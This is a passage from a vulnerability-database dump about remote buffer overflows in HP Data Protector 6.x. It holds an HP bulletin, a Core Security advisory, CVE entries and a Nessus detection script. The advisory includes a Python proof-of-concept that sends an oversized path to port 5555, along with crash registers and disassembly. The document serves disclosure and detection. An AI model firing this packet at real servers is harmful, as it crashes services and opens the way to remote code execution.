These vulnerabilities could be remotely exploited to execute arbitrary code.\r\n\r\nReferences: CVE-2011-1865, CORE-2011-0514; CVE-2011-1866, CORE-2011-0606\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Storage Data Protector v6.20 running on Windows.\r\nHP OpenView Storage Data Protector v6.11 running on Windows.\r\nHP OpenView Storage Data Protector v6.10 running on Windows.\r\nHP OpenView Storage Data Protector v6.00 running on Windows.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2011-1865 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2011-1866 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Nahuel C. Riva and Oren Isacson at CORE-SECURITY.com for\r\nreporting these vulnerabilities to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has provided the following procedure to resolve these vulnerabilities.\r\n1. Upgrade to Data Protector A.06.20 or subsequent\r\n2. 
Enable encrypted control communication services on cell server and all clients in cell\r\n\r\nThe upgrade is available for download from http://hp.com/go/dataprotector then under 'Product\r\nInformation' click on 'Trials and Demos'.\r\n\r\nHISTORY\r\nVersion: 1 (rev.1) - 28 June 2011 Initial release\r\nVersion: 2 (rev.2) - 28 June 2011 Updated attribution\r\nVersion: 3 (rev.3) - 29 June 2011 Corrected CVSS data\r\n\r\nhird Party Security Patches: Third party security patches that are to be installed on systems\r\nrunning HP software products should be applied in accordance with the customer's patch\r\nmanagement policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email\r\nto: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be\r\nencrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email:\r\nhttps://h41183.www4.hp.com/signup_alerts.php?lang=en&cc=US&prodSeriesId=&jumpid=hpsc_secbulletins\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\n 3C = 3COM\r\n 3P = 3rd Party Software\r\n GN = HP General Software\r\n HF = HP Hardware and Firmware\r\n MP = MPE/iX\r\n MU = Multi-Platform Software\r\n NS = NonStop Servers\r\n OV = OpenVMS\r\n PI = Printing and Imaging\r\n PV = ProCurve\r\n ST = Storage Software\r\n TU = Tru64 UNIX\r\n UX = HP-UX\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system\r\nintegrity. 
HP is continually reviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users\r\nof the affected HP products the important security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this information to their individual\r\nsituations and take appropriate action. HP does not warrant that this information is\r\nnecessarily accurate or complete for all user situations and, consequently, HP will not be\r\nresponsible for any damages resulting from user's use or disregard of the information provided\r\nin this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express\r\nor implied, including the warranties of merchantability and fitness for a particular purpose,\r\ntitle and non-infringement."\r\n\r\nCopyright 2011 Hewlett-Packard Development Company, L.P.\r\n\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions\r\ncontained herein. The information provided is provided "as is" without warranty of any kind. \r\nTo the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will\r\nbe liable for incidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or services; or damages for\r\nloss of data, or software restoration. The information in this document is subject to change\r\nwithout notice. 
Hewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and other countries.\r\nOther product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk4Lun4ACgkQ4B86/C0qfVlnbQCgrHWQHFYB5Gux1C5M7OiPW+Q+\r\n2XUAn3tiNudYuuArpTtX4IQdOA/G1a4f\r\n=BrzP\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:DOC:26620", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26620", "title": "[security bulletin] HPSBMU02686 SSRT100541 rev.3 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-1866"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\r\nAdvisory ID: CORE-2011-0606\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1866\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. 
A vulnerability in HP Data\r\nProtector could allow a remote attacker to execute arbitrary code. The\r\nvulnerability is triggered by sending a request to port 5555 of a host\r\nrunning the "data protector inet" service, part of HP Data Protector.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to this issue. HP\r\nhas provided the following procedure to mitigate this vulnerability:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Nahuel C. Riva from\r\nCore Security Technologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. 
*Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the bug.\r\n\r\n/-----\r\nimport sys\r\nimport socket\r\n\r\nfrom struct import pack\r\n\r\nip = sys.argv[1]\r\nport = int(sys.argv[2]) # default tcp port 5555\r\n\r\ntarget = (ip, port)\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(target)\r\n\r\npath = 'A' * 5000\r\n\r\npacket = pack('<L', 0x20003220)\r\npacket += pack('<L', 0x00302000)\r\npacket += '\x20'\r\npacket += pack('>H', 0x0020)\r\npacket += pack('<L', 0x00432000)\r\npacket += pack('<L', 0x00303220)\r\npacket += '\x20'\r\npacket += 'omnicheck.exe'\r\npacket += pack('>H', 0x0020)\r\npacket += pack('>H', 0x0020) * 4\r\npacket += pack('<L', 0x30200030)\r\npacket += pack('>H', 0x0020)\r\npacket += path\r\npacket += pack('>H', 0x0000)\r\n\r\nplen = pack('>L', len(packet))\r\n\r\ns.send(plen + packet)\r\n\r\n- -----/\r\n By executing this script, the omniinet.exe process crashes in the\r\nfollowing EIP:\r\n\r\n/-----\r\n7C8285D3 8B0424 MOV EAX,DWORD PTR SS:[ESP]\r\n7C8285D6 8BE5 MOV ESP,EBP\r\n7C8285D8 5D POP EBP\r\n7C8285D9 C3 RETN\r\n \r\n- -----/\r\n This is part of a function inside the ntdll.dll library, however, if we\r\nlook the SEH chain, we can see that the SEH handler was overwritten with\r\nthe value 0x00410041 (the unicode value for "AA"):\r\n\r\n/-----\r\nSEH chain of thread 00000578\r\nAddress SE handler\r\n009AFF94 omniinet.00410041\r\n00410041 A3004472\r\n \r\n- -----/\r\n The following are the values of the CPU registers at the time of the\r\ncrash:\r\n\r\n/-----\r\nEAX C0000008\r\nECX 009AEC98\r\nEDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher\r\nEBX 0015B480\r\nESP 009AEC44\r\nEBP 009AEC94\r\nESI 00155A80\r\nEDI 00000000\r\nEIP 7C8285D3 ntdll.7C8285D3\r\nC 0 ES 0023 32bit 0(FFFFFFFF)\r\nP 1 CS 001B 32bit 0(FFFFFFFF)\r\nA 0 SS 0023 32bit 0(FFFFFFFF)\r\nZ 0 DS 0023 32bit 0(FFFFFFFF)\r\nS 0 FS 003B 32bit 7FFDB000(FFF)\r\nT 0 GS 0000 NULL\r\nD 0\r\nO 0 LastErr 
ERROR_SUCCESS (00000000)\r\nEFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)\r\nST0 empty 0.0\r\nST1 empty 0.0\r\nST2 empty 0.0\r\nST3 empty 0.0\r\nST4 empty 0.0\r\nST5 empty 0.0\r\nST6 empty 0.7610000000000000098\r\nST7 empty 1.0000000000000000000\r\n 3 2 1 0 E S P U O Z D I\r\nFST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)\r\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\r\n \r\n- -----/\r\n The problem is in the 0041D170 function. This function does a blind\r\ncopy of the string passed in the packet as a path:\r\n\r\n/-----\r\n0041D170 /$ 55 PUSH EBP\r\n0041D171 |. 8BEC MOV EBP,ESP\r\n0041D173 |. 51 PUSH ECX\r\n0041D174 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D177 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\r\n0041D17A |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]\r\n0041D17D |. 0FB711 MOVZX EDX,WORD PTR DS:[ECX]\r\n0041D180 |. 85D2 TEST EDX,EDX\r\n0041D182 |. 74 73 JE SHORT omniinet.0041D1F7\r\n[...]\r\n0041D1F7 |> 8B45 0C /MOV EAX,DWORD PTR SS:[EBP+C]\r\n0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX]\r\n0041D1FD |. 85C9 |TEST ECX,ECX\r\n0041D1FF |. 74 26 |JE SHORT omniinet.0041D227\r\n0041D201 |. 8B55 08 |MOV EDX,DWORD PTR SS:[EBP+8]\r\n0041D204 |. 8955 FC |MOV DWORD PTR SS:[EBP-4],EDX\r\n0041D207 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D20A |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\r\n0041D20D |. 66:8B11 |MOV DX,WORD PTR DS:[ECX]\r\n0041D210 |. 66:8910 |MOV WORD PTR DS:[EAX],DX // copy WORDs\r\nto the stack\r\n0041D213 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D216 |. 83C0 02 |ADD EAX,2\r\n0041D219 |. 8945 08 |MOV DWORD PTR SS:[EBP+8],EAX\r\n0041D21C |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\r\n0041D21F |. 83C1 02 |ADD ECX,2\r\n0041D222 |. 894D 0C |MOV DWORD PTR SS:[EBP+C],ECX\r\n0041D225 |.^EB D0 \JMP SHORT omniinet.0041D1F7\r\n0041D227 |> 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]\r\n0041D22A |. 66:C702 0000 MOV WORD PTR DS:[EDX],0\r\n0041D22F |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\n0041D232 |. 8BE5 MOV ESP,EBP\r\n0041D234 |. 5D POP EBP\r\n0041D235 \. 
C3 RETN\r\n \r\n- -----/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n 2011-06-06:\r\nCore Security Technologies notifies the HP team of the vulnerabilities\r\nand provides the technical details. Publication date is temporarily set\r\nto July 5th, 2011.\r\n\r\n 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n 2011-06-23:\r\nCore requests once more an update.\r\n\r\n 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n 2011-06-29:\r\nAdvisory CORE-2011-0606 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. 
We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. 
*PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay\r\nEAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo\r\n=zHon\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:DOC:26622", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26622", "title": "CORE-2011-0606: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2020-10-03T11:39:27", "description": "Multiple stack-based buffer overflows in the inet service in HP OpenView Storage Data Protector 6.00 through 6.20 allow remote attackers to execute arbitrary code via a request containing crafted parameters.", "edition": 3, "cvss3": {}, "published": "2011-07-01T10:55:00", "title": "CVE-2011-1865", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1865"], "modified": "2017-08-17T01:34:00", "cpe": ["cpe:/a:hp:openview_storage_data_protector:6.11", "cpe:/a:hp:openview_storage_data_protector:6.10", "cpe:/a:hp:openview_storage_data_protector:6.20", 
"cpe:/a:hp:openview_storage_data_protector:6.00"], "id": "CVE-2011-1865", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1865", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_storage_data_protector:6.20:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.00:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.10:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:39:27", "description": "Buffer overflow in omniinet.exe in the inet service in HP OpenView Storage Data Protector 6.00 through 6.20 allows remote attackers to execute arbitrary code via a crafted request, related to the EXEC_CMD functionality.", "edition": 3, "cvss3": {}, "published": "2011-07-01T10:55:00", "title": "CVE-2011-1866", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1866"], "modified": "2018-10-09T19:32:00", "cpe": ["cpe:/a:hp:openview_storage_data_protector:6.11", "cpe:/a:hp:openview_storage_data_protector:6.10", "cpe:/a:hp:openview_storage_data_protector:6.20", "cpe:/a:hp:openview_storage_data_protector:6.00"], "id": "CVE-2011-1866", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1866", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_storage_data_protector:6.20:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.11:*:*:*:*:*:*:*", 
"cpe:2.3:a:hp:openview_storage_data_protector:6.00:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.10:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:39:26", "description": "The inet service in HP OpenView Storage Data Protector 6.00 through 6.20 allows remote attackers to cause a denial of service (daemon exit) via a request containing crafted parameters.", "edition": 4, "cvss3": {}, "published": "2011-07-01T10:55:00", "title": "CVE-2011-1515", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1515"], "modified": "2019-10-09T23:02:00", "cpe": ["cpe:/a:hp:openview_storage_data_protector:6.11", "cpe:/a:hp:openview_storage_data_protector:6.10", "cpe:/a:hp:openview_storage_data_protector:6.20", "cpe:/a:hp:openview_storage_data_protector:6.00"], "id": "CVE-2011-1515", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1515", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:hp:openview_storage_data_protector:6.20:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.00:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.10:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:39:26", "description": "The inet service in HP OpenView Storage Data Protector 6.00 through 6.20 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request containing crafted parameters.\nPer: 
http://cwe.mitre.org/data/definitions/476.html\r\n'CWE-476: NULL Pointer Dereference'", "edition": 4, "cvss3": {}, "published": "2011-07-01T10:55:00", "title": "CVE-2011-1514", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1514"], "modified": "2019-10-09T23:02:00", "cpe": ["cpe:/a:hp:openview_storage_data_protector:6.11", "cpe:/a:hp:openview_storage_data_protector:6.10", "cpe:/a:hp:openview_storage_data_protector:6.20", "cpe:/a:hp:openview_storage_data_protector:6.00"], "id": "CVE-2011-1514", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1514", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:hp:openview_storage_data_protector:6.20:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.00:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.10:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-01-01T03:15:31", "description": "The version of HP Data Protector installed on the remote Windows host\nis affected by one or more of the following vulnerabilities :\n\n - Multiple denial of service vulnerabilities exist in the\n 'data protect inet' service. (CVE-2011-1514, \n CVE-2011-1515)\n\n - A buffer overflow vulnerability exists in the 'data\n protector inet' service that can be exploited via \n EXEC_CMD. 
(CVE-2011-1864)\n\n - A buffer overflow vulnerability exists in the inet\n service that could result in code execution via a \n request containing crafted parameters. (CVE-2011-1865)", "edition": 26, "published": "2011-07-11T00:00:00", "title": "HP Data Protector <= A.06.20 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865", "CVE-2011-1864", "CVE-2011-1866"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:storage_data_protector"], "id": "HP_DATA_PROTECTOR_0620_MULTIPLE_VULNS_CREDS.NASL", "href": "https://www.tenable.com/plugins/nessus/55551", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55551);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\n \"CVE-2011-1514\",\n \"CVE-2011-1515\",\n \"CVE-2011-1865\", \n \"CVE-2011-1866\"\n );\n script_bugtraq_id(48486, 48488);\n script_xref(name:\"Secunia\", value:\"45100\");\n\n script_name(english:\"HP Data Protector <= A.06.20 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks if encrypted control communication services is enabled.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP Data Protector installed on the remote Windows host\nis affected by one or more of the following vulnerabilities :\n\n - Multiple denial of service vulnerabilities exist in the\n 'data protect inet' service. (CVE-2011-1514, \n CVE-2011-1515)\n\n - A buffer overflow vulnerability exists in the 'data\n protector inet' service that can be exploited via \n EXEC_CMD. 
(CVE-2011-1864)\n\n - A buffer overflow vulnerability exists in the inet\n service that could result in code execution via a \n request containing crafted parameters. (CVE-2011-1865)\");\n\n # http://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d655681\");\n # http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79bee660\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e38ce76\");\n script_set_attribute(attribute:\"solution\", value:\n\"1. Upgrade to Data Protector A.06.20 or later and\n\n2. Enable encrypted control communication services on cell server and\n all clients in cell.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-12-076\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe Opcode 20 Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/06/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:storage_data_protector\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_data_protector_installed_local.nasl\");\n script_require_keys(\"SMB/HP Data Protector/Version\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit('SMB/HP Data Protector/Version');\nencrypted_comm = get_kb_item_or_exit('SMB/HP Data Protector/Encrypted');\nverui = get_kb_item('SMB/HP Data Protector/VersionUI');\ntype = get_kb_item('SMB/HP Data Protector/Type');\npath = get_kb_item('SMB/HP Data Protector/Path');\n\nif (encrypted_comm) encrypted_comm = 'True';\nelse encrypted_comm = 'False';\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n ver[0] < 6 || \n (ver[0] == 6 && ver[1] < 20) ||\n (ver[0] == 6 && ver[1] == 20 && encrypted_comm == 'False')\n)\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n Path : ' + path + \n '\\n Install type : ' + type +\n '\\n Encryption : ' + encrypted_comm + \n '\\n Installed version : ' + verui +\n '\\n Fixed version : A.06.20 with encrypted control communications services \\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n exit(0);\n}\nelse exit(0, 'The HP Data Protector '+verui+' install is not affected.');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T15:46:26", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "HP Data Protector 6.20 - Multiple Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1514", "CVE-2011-1515", "CVE-2011-1865"], "modified": 
